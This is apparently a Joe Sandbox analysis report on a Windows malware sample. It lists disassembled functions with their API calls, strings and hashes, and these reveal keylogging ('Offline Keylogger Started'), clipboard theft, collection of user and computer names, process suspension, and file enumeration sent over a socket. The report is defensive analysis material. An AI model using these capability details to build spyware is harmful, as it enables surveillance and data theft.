                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                • _wcschr.LIBVCRUNTIME ref: 00451E58
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                • API String ID: 4212172061-3536923933
                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040783C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: PkGNG
                                • API String ID: 1703294689-263838557
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B60D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,(x), ref: 0041B62A
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID: (x
                                • API String ID: 4229901323-2016957024
                                • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040B711
                                • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                • CloseClipboard.USER32 ref: 0040B725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenSuspend
                                • String ID:
                                • API String ID: 1999457699-0
                                • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenResume
                                • String ID:
                                • API String ID: 3614150671-0
                                • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                Uniqueness

                                Uniqueness Score: -1.00%

